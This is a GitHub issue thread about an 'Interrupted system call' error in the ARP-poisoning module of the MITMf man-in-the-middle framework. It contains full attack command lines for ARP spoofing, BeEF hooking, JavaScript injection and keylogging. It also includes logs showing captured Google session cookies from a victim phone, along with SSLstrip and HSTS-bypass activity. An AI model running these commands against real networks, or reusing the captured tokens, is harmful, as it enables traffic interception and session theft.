### ISSUE TITLE
'Interrupted system call' error while ARP spoofing

### ISSUE THREAD

**Issue by DrDinosaur** [byt3bl33d3r/MITMf#109]
`2015-06-02 15:57:35 [ARPpoisoner] Exception occurred while poisoning 192.168.2.109: (4, 'Interrupted system call')`

I get these frequently. I'm not sure what they mean. They don't seem to affect anything as far as I can tell though.

**Comment by byt3bl33d3r** [comment]
@DrDinosaur You're correct it doesn't.. I haven't identified the exact cause of it yet but it's probably a threading issue, for now I'll just add in some error handling to get rid of it since a lot of other users seem to be getting this error a lot

**Comment by auraltension** [comment]
I intermittently get these also.  I notice that when I get them, I get only these messages as logs and no other messages are showing on my console. They appear approx every three seconds.  ARP poisoning is still successful and I can do things such as js injecting.

One thing I've spotted is that when this happens it is preceded by a logged error in MAC resolution.

```
2015-06-04 18:45:53 [ARPpoisoner] Unable to resolve MAC address of 192.16.0.150
2015-06-04 18:45:56 [ARPpoisoner] Exception occurred while poisoning 192.16.0.150: (4, 'Interrupted system call')
```

**Comment by byt3bl33d3r** [comment]
@auraltension can you post the output of the command you used + ```--log debug```?
Thanks

**Comment by byt3bl33d3r** [comment]
@DrDinosaur if you could do that to that would be awesome

**Comment by byt3bl33d3r** [comment]
Re-opening as a reminder

**Comment by auraltension** [comment]
Argh, sorry I should have posted the command.

    sudo python mitmf.py -i ens35u1 --beefauto --spoof --arp --arpmode req --gateway 192.16.0.1

I tried a whole bunch of times last night with debug log level but never had the issue trigger while doing so.

**Comment by auraltension** [comment]
Also to note. I'd never seen these prior to a recent pull (my previous pull was on March 4), this may not be relevant as this is intermittent, but I had run MITMf a whole bunch of times previously and never seen it.

**Comment by auraltension** [comment]
With debug logs:

    sudo python mitmf.py -i eth1 --beefauto --spoof --arp --gateway 192.16.0.1 --targets 192.16.0.251 --arpmode req --log debug

```
2015-06-06 17:04:26 [ProxyPlugins] Adding BeEFAutorun plugin
2015-06-06 17:04:26 [Utils] Setting ip forwarding to 1
2015-06-06 17:04:26 [Utils] Setting iptables HTTP redirection rule from port 80 to 10000
2015-06-06 17:04:26 [ARPpoisoner] gatewayip  => 192.16.0.1
2015-06-06 17:04:26 [ARPpoisoner] gatewaymac => a0:f3:c1:73:1c:20
2015-06-06 17:04:26 [ARPpoisoner] targets    => ['192.16.0.251']
2015-06-06 17:04:26 [ARPpoisoner] targetmac  => None
2015-06-06 17:04:26 [ARPpoisoner] mymac      => dc:9b:9c:ee:1f:3c
2015-06-06 17:04:26 [ARPpoisoner] interface  => eth1
2015-06-06 17:04:26 [ARPpoisoner] arpmode    => rep
2015-06-06 17:04:26 [ARPpoisoner] interval   => 3
2015-06-06 17:04:26 [ProxyPlugins] Adding Spoof plugin
2015-06-06 17:04:26 [SMBserver] Config file parsed
2015-06-06 17:04:26 [SMBserver] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2015-06-06 17:04:26 [SMBserver] Config file parsed
2015-06-06 17:04:28 [ARPpoisoner] Unable to resolve MAC address of 192.16.0.251
2015-06-06 17:04:31 [ARPpoisoner] Exception occurred while poisoning 192.16.0.251: (4, 'Interrupted system call')
2015-06-06 17:04:34 [ARPpoisoner] Exception occurred while poisoning 192.16.0.251: (4, 'Interrupted system call')
2015-06-06 17:04:38 [ARPpoisoner] Exception occurred while restoring connection 192.16.0.251: (4, 'Interrupted system call')
2015-06-06 17:04:38 [Utils] Flushing iptables
2015-06-06 17:04:38 [Utils] Setting ip forwarding to 0
```

Also, this is actually happening quite frequently.

**Comment by auraltension** [comment]
Interesting to see that 'arpmode rep' when I've set it to 'req'

**Comment by byt3bl33d3r** [comment]
@auraltension thanks, I might have just figured out the cause of the issue, will let you know when I push the changes to you guys can test them.

Also fixed an incorrect ```or``` statement that made arpmode always be set to 'rep'

**Comment by auraltension** [comment]
haha, I was sure I was getting better results with 'req' but I guess not after all.

**Comment by byt3bl33d3r** [comment]
@DrDinosaur @auraltension could you please confirm this issue is resolved? thanks

**Comment by TadeoArmenta** [comment]
not, the problem still there.

scapy have an open issue about this

http://bb.secdev.org/scapy/issue/473/scapy-sendrecv-selects-eintr-problem-in

**Comment by byt3bl33d3r** [comment]
@TadeoArmenta thanks for the info! I don't know why you would want to use 0.9.6 though since 0.9.7 is a huge improvement

**Comment by TadeoArmenta** [comment]
i know is a huge improvement, I'm just saying, that spoofing is not working, and can't get back to a version that works.

**Comment by byt3bl33d3r** [comment]
@TadeoArmenta ARP/DHCP/ICMP spoofing works even with this error, it doesn't effect functionality in any way. You can see for yourself using Wireshark if you want

**Comment by TadeoArmenta** [comment]
i'm trying it against my cell, and in the moment that the error apears, the spoof stop working, and the logs get nothing but the error. some times the error doesn't appears since the beginning, some times it doesn't appears at all.
0.9.6 works fine against my cell.

**Comment by byt3bl33d3r** [comment]
@TadeoArmenta can you confirm this using Wireshark?

**Comment by TadeoArmenta** [comment]
[*] MITMf v0.9.7 online... initializing plugins
|_ Ferret-NG v0.1
|  |_ Listening on port 10010
|_ Spoof v0.6
|_ SSLstrip+ v0.4
|  |_ SSLstrip+ by Leonardo Nve running
|
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|_ Net-Creds v1.0 online
|_ DNSChef v0.4 online
|_ SMBserver online (Impacket 9.13)

2015-06-06 10:06:47 [SMBserver] Config file parsed
2015-06-06 10:06:47 [SMBserver] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2015-06-06 10:06:47 [SMBserver] Config file parsed
2015-06-06 10:06:47 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:06:50 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:06:53 127.0.0.1 [DNSChef] Resolving 'wwww.google.com.mx' to 'www.google.com.mx' for HSTS bypass
2015-06-06 10:06:53 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:06:53 192.168.1.70 [Ferret-NG] Host: wwww.google.com.mx Captured cookie: PREF=ID=c9ec0cf996e263cf:U=c3d189d0c2892e80:FF=0:LD=es-419:TM=1433037801:LM=1433037867:S=JUj4JspuYLLd5TaG; SID=DQAAAAgBAAAeQeeMKCqTCrXxJw_i8keYfxYNJyNtxI2_6rIE_jFxloCgLJqW5S3jJ4fYDgRr5pWgDdyVemki3K9GeY7Y9WUegaUCd7V-WWsh7gUzdNWduEVJeIpBB-wpH4arZABg0cDljMg11JtXuKFpKw_vvJLh37UBRl6kYt1_6dAAKAfIaIE4sVCSURq6h_5uGGNPfRhpWG0dGyeAZfoytM0rqRMvJEhjpV7w-E1WRiCoyFUZKdv5hLwsUX-yhU5hMWKUmSwZtT073a-Gb3UZkv6wQhYSPmKc5kFBa0yq1918raaHWLiNar66Gzn6SWKszi9VzKRVtLgfPqgEhNX_VQ0qrnkm1SoCbkXICJPe6fj-8V79IQ; HSID=AgFA9L5ME4beeqvT_; SSID=APyMIoGDnJrWdH-v8; APISID=mkvZh5_OFYCCWNQy/ArPujIfCn--cqZvoS; SAPISID=JT3L7vCnTzoJYiuN/AXEjmbt5pIVGsoKBF; NID=67=Cyj5VH6muFXt8fGfWfGP2lmG1NXLiPL3TWaIFEf4SVTaJ_2EapassSSlj8zB2oB7aoh-pwY-OKDaG7Nsi3cA-E8CJVW64Z0yed_qmGZ7od7_MMrkpzH-WvPw_RxMcxvSk5aSpHuaYxYbJ_xd8sMKiaJanFK1846hgGx2CZPYF7nGTffVqEhqVmhE5DI5paBVPrp3CuJfxoQwnMarAVPhOx9CHvlzdbIcTL9_Q2lH; UULE=a+cm9sZToxCnByb2R1Y2VyOjEyCnByb3ZlbmFuY2U6Ngp0aW1lc3RhbXA6MTQzMzYxMDM2MzMxNzAwMApsYXRsbmd7CmxhdGl0dWRlX2U3OjI3NDM5Njg2NApsb25naXR1ZGVfZTc6LTEwOTkyMjIxNjUKfQpyYWRpdXM6MjMwMDA=
2015-06-06 10:06:53 192.168.1.70 [type:Chrome 30.0.1599.103 os:Android Linux 4.4.2] Sending Request: wwww.google.com.mx
2015-06-06 10:06:54 192.168.1.70 [Ferret-NG] Host: www.google.com Captured cookie: PREF=ID=180e7acd1973e84e:FF=0:LD=es-419:TM=1433037875:LM=1433037875:S=Keno1FJbxk7FaVKb; NID=67=P9k4DS28YwUlNGLleiplrFnCm5go-IZYWwVFTMpvFAVWgkclcQ4tGH-kxjFy7R35Yv_bTHYsp6sWEz5T-C62oNveekwTJiBJkwbZsx1hQdPad8dZ_oshCJWcCDxC5AmvLIxsnq6zhl8TnNCJEtHSiJCKuNJKl1n_3FZhiBkklZogIzx_; SID=DQAAAAYBAAAeQeeMKCqTCrXxJw_i8keYfxYNJyNtxI2_6rIE_jFxloCgLJqW5S3jJ4fYDgRr5pWgDdyVemki3K9GeY7Y9WUegaUCd7V-WWsh7gUzdNWduEVJeIpBB-wpH4arZABg0cDljMg11JtXuKFpKw_vvJLh37UBRl6kYt1_6dAAKAfIaIE4sVCSURq6h_5uGGNPfRhpWG0dGyeAZfoytM0rqRMvJEhjpV7w-E1WRiCoyFUZKdv5hLwsUX-yhU5hMWKUmSwZtT073a-Gb3UZkv6wQhYSemFCOiL55FYtsvHBcI9qyEtgephJFkmnL5UaKSDKn08MZO3o32EPrTgdZfb3dSDWAJRZLkyGwJPi6Amzfa5rCw; HSID=APlJwFwnxgyqpqHtO; SSID=Ah-yShx8z9wrsKLXO; APISID=mkvZh5_OFYCCWNQy/ArPujIfCn--cqZvoS; SAPISID=JT3L7vCnTzoJYiuN/AXEjmbt5pIVGsoKBF
2015-06-06 10:06:54 192.168.1.70 [type:Chrome 30.0.1599.103 os:Android Linux 4.4.2] Sending Request: www.google.com
2015-06-06 10:06:54 192.168.1.70 [type:Chrome 30.0.1599.103 os:Android Linux 4.4.2] Sending Request: wwww.google.com.mx
2015-06-06 10:06:56 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:06:59 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:07:02 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:07:05 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:07:08 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:07:11 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:07:14 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:07:17 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:07:21 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:07:24 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:07:27 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:07:30 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:07:33 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:07:36 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:07:39 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:07:42 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:07:45 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:07:48 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:07:51 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:07:54 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:07:57 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
^C

2015-06-06 10:08:00 [Ferret-NG] Writing cookies to log file
2015-06-06 10:08:03 [ARPpoisoner] Exception occurred while restoring connection 192.168.1.65: (4, 'Interrupted system call')

**Comment by byt3bl33d3r** [comment]
@TadeoArmenta ... yep I get it, that's the problem! what I asked is if you could open up wireshark and confirm that there are no ARP packets going down the wire

**Comment by byt3bl33d3r** [comment]
@auraltension @DrDinosaur @TadeoArmenta also, just out of curiosity, if you could all give me the Scapy version you guys are using that would be great

**Comment by byt3bl33d3r** [comment]
Never mind, just got it again ! :P

**Comment by TadeoArmenta** [comment]
im using scapy 2.3.1 but also tried 2.2.0 same error.

wireshark says

1	0.000000000	5c:f9:6a:bf:9d:ee	IntelCor_71:56:e2	ARP	42	Who has 192.168.1.68?  Tell 192.168.1.254
2	0.000051000	IntelCor_71:56:e2	5c:f9:6a:bf:9d:ee	ARP	42	192.168.1.68 is at bc:77:37:71:56:e2
3	3.541486000	IntelCor_71:56:e2	Broadcast	ARP	42	Who has 192.168.1.254?  Tell 192.168.1.68
4	3.543137000	5c:f9:6a:bf:9d:ee	IntelCor_71:56:e2	ARP	42	192.168.1.254 is at 5c:f9:6a:bf:9d:ee
5	3.609548000	IntelCor_71:56:e2	Broadcast	ARP	42	Who has 192.168.1.65?  Tell 192.168.1.68
7	8.677110000	IntelCor_71:56:e2	Broadcast	ARP	42	Who has 192.168.1.65?  Tell 192.168.1.68
12	11.721111000	IntelCor_71:56:e2	Broadcast	ARP	42	Who has 192.168.1.65?  Tell 192.168.1.68
17	14.779307000	IntelCor_71:56:e2	Broadcast	ARP	42	Who has 192.168.1.65?  Tell 192.168.1.68
22	17.855561000	IntelCor_71:56:e2	Broadcast	ARP	42	Who has 192.168.1.65?  Tell 192.168.1.68
29	20.894620000	IntelCor_71:56:e2	Broadcast	ARP	42	Who has 192.168.1.65?  Tell 192.168.1.68
74	23.954193000	IntelCor_71:56:e2	Broadcast	ARP	42	Who has 192.168.1.65?  Tell 192.168.1.68
138	27.031896000	IntelCor_71:56:e2	Broadcast	ARP	42	Who has 192.168.1.65?  Tell 192.168.1.68
147	30.105709000	IntelCor_71:56:e2	Broadcast	ARP	42	Who has 192.168.1.65?  Tell 192.168.1.68
......(many more )
937	87.053763000	5c:f9:6a:bf:9d:ee	IntelCor_71:56:e2	ARP	42	Who has 192.168.1.68?  Tell 192.168.1.254
938	87.053819000	IntelCor_71:56:e2	5c:f9:6a:bf:9d:ee	ARP	42	192.168.1.68 is at bc:77:37:71:56:e2

mitmf
[*] MITMf v0.9.7 online... initializing plugins
|_ Ferret-NG v0.1
|  |_ Listening on port 10010
|_ Spoof v0.6
|_ SSLstrip+ v0.4
|  |_ SSLstrip+ by Leonardo Nve running
|
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|_ Net-Creds v1.0 online
|_ DNSChef v0.4 online
|_ SMBserver online (Impacket 9.13)

2015-06-06 10:12:42 [SMBserver] Config file parsed
2015-06-06 10:12:42 [SMBserver] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2015-06-06 10:12:42 [SMBserver] Config file parsed
2015-06-06 10:12:44 [ARPpoisoner] Unable to resolve MAC address of 192.168.1.65
2015-06-06 10:12:47 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:12:50 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:12:54 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:12:57 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:13:00 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:13:03 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:13:06 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:13:09 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:13:12 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:13:15 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:13:18 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:13:21 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:13:24 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:13:27 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:13:30 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:13:33 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:13:36 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:13:40 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:13:43 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:13:46 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:13:49 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:13:52 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
2015-06-06 10:13:55 [ARPpoisoner] Exception occurred while poisoning 192.168.1.65: (4, 'Interrupted system call')
^C

2015-06-06 10:14:00 [ARPpoisoner] Exception occurred while restoring connection 192.168.1.65: (4, 'Interrupted system call')

**Comment by byt3bl33d3r** [comment]
@TadeoArmenta ok you shouldn't see that error any more with the latest commit.. It doesn't actually fix the problem though :P. I'll see if I track down the bug in the scapy source code, in the meantime this should suffice

**Comment by auraltension** [comment]
I can confirm that I'm no longer seeing the exceptions scrolling down my window. 

However I do still see these `Unable to resolve MAC address of` errors, which are followed by no more logs to stdout, and I lose http traffic coming through me from targets.  I did some packet capturing of ARP at the time but messed up my filter so it's not much use.  Next time I see it I'll try again.

```
2015-06-07 16:11:02 [ARPpoisoner] Unable to resolve MAC address of 192.16.0.150
2015-06-07 16:11:11 [ARPpoisoner] Unable to resolve MAC address of 192.16.0.150
<wait a couple minutes>
^C
```

**Comment by twayz** [comment]
I get the same thing ^. but it seems to be working

**Comment by byt3bl33d3r** [comment]
@auraltension @twayz I removed that error message as well, it will only appear if you pass ```--log debug```

**Comment by byt3bl33d3r** [comment]
T

**Comment by byt3bl33d3r** [comment]
The errors should be gone in the latest commits

**Comment by auraltension** [comment]
Sorry for not getting back to you on these. After pulling I got capstone errores and have been afk since and am yet to get back to seeing what's going on there.

**Comment by curtis5000** [comment]
Hi am getting same error, also not getting any result, i mean js is not inject
am on mitmf v 0.9.7
am trying to do this over WAN, and i am also using vpn service to portforward.

**Comment by byt3bl33d3r** [comment]
@curtis5000 upgrading to 0.9.8 will resolve this issue

**Comment by curtis5000** [comment]
I did apt-get install mitmf, but it responded with i already have the latest version which is 0.9.7, how do i upgrade.
also am using vpn on a router for attack over WAN, does the mitmf command still goes as.
mitmf --spoof --arp -i --wlan0 --gateway 192.168.1.1 --target xx.xx.xx.xx --java -js-url http://link.con/file.js.
Thx

**Comment by daw1012345** [comment]
MITMf on the kali repos is deprecated. Use the instructions on the wiki (https://github.com/byt3bl33d3r/MITMf/wiki/Installation) to get the latest version.

**Comment by curtis5000** [comment]
Following the instructions on the wiki (https://github.com/byt3bl33d3r/MITMf/wiki/Installation)
I could not Create virtualenv
I have python2.7 located in folders '/usr/lib/python2.7' & '/usr/local/lib/python2.7'
In same folders, i have python 3.4
When i run command, i get the following:

root@kali:~# mkvirtualenv MITMf -p /usr/lib/python2.7 OR /usr/local/lib/python2.7
Running virtualenv with interpreter /usr/lib/python2.7
Traceback (most recent call last):
  File "/usr/local/bin/virtualenv", line 11, in <module>
    sys.exit(main())
  File "/usr/local/lib/python2.7/dist-packages/virtualenv.py", line 790, in main
    popen = subprocess.Popen([interpreter, file] + sys.argv[1:], env=env)
  File "/usr/lib/python2.7/subprocess.py", line 710, in __init__
    errread, errwrite)
  File "/usr/lib/python2.7/subprocess.py", line 1335, in _execute_child
    raise child_exception
OSError: [Errno 13] Permission denied
root@kali:~# 

What do i do here pls?
Thx

**Comment by sidjad** [comment]
mitmf -i wlan0 --spoof --arp --arpmode req --gateway 192.168.1.1 --target 192.168.1.7 --jskeylogger -s


[*] MITMf v0.9.7 online... initializing plugins
|_ Spoof v0.6
[ARPpoisoner] Error: Could not resolve gateway's MAC address


what should i do for this error

**Comment by haddadou** [comment]
Error: Could not resolve gateway's MAC address !!!! hlp

**Comment by arismelachroinos** [comment]
me too! Error: Could not resolve gateway's MAC address
thats what i get when i use wlan0 interface. on eth0 it is working with no errors.
